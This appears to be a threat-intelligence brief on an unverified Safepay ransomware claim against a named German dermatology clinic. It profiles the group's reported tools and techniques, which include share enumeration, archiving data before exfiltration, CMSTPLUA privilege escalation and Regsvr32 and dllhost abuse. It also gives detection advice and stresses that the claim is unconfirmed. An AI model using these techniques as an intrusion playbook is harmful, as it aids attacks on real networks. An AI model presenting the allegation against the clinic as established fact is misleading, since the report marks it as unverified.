Hautarzt-Budihardja.de Ransomware by Safepay (May 2026)

Claim Summary

The ransomware group known as Safepay has allegedly claimed responsibility for a cyberattack against the German dermatology clinic operating under the domain hautarzt-budihardja.de. According to the group’s leak site, the attack occurred on May 18, 2026. The clinic, led by Dr. med. Debby Budihardja, a board-certified dermatologist and allergologist, is purportedly the victim of data exfiltration and encryption.

The threat actor has not disclosed the volume of data allegedly stolen, nor has it provided any samples or proof of compromise at this time. This claim has not been independently verified by Yazoul Security or any third-party intelligence source.

Threat Actor Profile

Safepay is a relatively obscure ransomware group with limited public track record. According to available intelligence, the group has an unknown total number of confirmed victims, and no public research or attribution reports are currently available for this actor.

Known tools associated with Safepay operations include:

• Invoke-ShareFinder – Used for network share enumeration and discovery.
• 7-Zip and WinRAR – Employed for data compression and archiving prior to exfiltration.
• CMSTPLUA – A living-off-the-land binary (LOLBin) used for privilege escalation via Microsoft Connection Manager Profile Installer.
• Regsvr32.exe – Used for code execution via signed Microsoft binary.
• dllhost.exe – Commonly abused for process hollowing or COM surrogate execution.

The group’s TTPs suggest a reliance on legitimate system tools and LOLBins to evade detection. However, due to the lack of confirmed victims and public research, the group’s operational maturity and credibility remain low. It is possible that Safepay is a rebranded or splinter group, or that this claim is exaggerated or fabricated.

Alleged Data Exposure

The group claims to have exfiltrated data from the clinic’s systems, but has not specified the types of records involved. Given the healthcare vertical, potential data categories could include:

• Patient medical histories and treatment records
• Personal identifiable information (PII) such as names, addresses, and contact details
• Insurance and billing information
• Internal clinic communications and operational data

No file listings, sample documents, or database dumps have been provided by Safepay as of this writing. The absence of proof of compromise is a significant red flag, as established ransomware groups typically release at least partial data to pressure victims.

Potential Impact

If the claim is verified, the impact on hautarzt-budihardja.de could be severe:

• Regulatory consequences: As a German healthcare provider, the clinic is subject to GDPR and the German Patient Data Protection Act (PDSG). A data breach could result in fines up to 4% of annual global turnover or €20 million, whichever is higher.
• Operational disruption: Ransomware encryption may have disrupted patient scheduling, electronic health record access, and billing systems.
• Reputational damage: Patients may lose trust in the clinic’s ability to safeguard sensitive medical data.
• Legal liability: Affected patients could pursue civil claims for damages arising from data exposure.

What to Watch For

• Proof of data: Monitor Safepay’s leak site for any subsequent release of data samples or file lists. If none appear within 7-14 days, the claim is likely a bluff.
• Clinic communications: Watch for official statements from hautarzt-budihardja.de or German health authorities (e.g., BfDI, LfDI) confirming or denying the incident.
• Dark web chatter: Track forums and Telegram channels for any discussions about Safepay’s credibility or additional victim claims.
• YARA rules: No publicly available YARA rules exist for Safepay at this time. Detection guidance should focus on monitoring for the known LOLBin usage patterns (CMSTPLUA, Regsvr32.exe, dllhost.exe) and bulk file compression tools (7-Zip, WinRAR) in unusual contexts.

Disclaimer

This report is based solely on unverified claims posted by the Safepay ransomware group on their leak site. Yazoul Security has not independently confirmed the attack, data exfiltration, or any operational impact on hautarzt-budihardja.de. Ransomware groups frequently exaggerate or fabricate claims to pressure victims into paying ransoms. All information should be treated as preliminary and subject to change upon verification. No PII, download links, or access credentials are included in this report.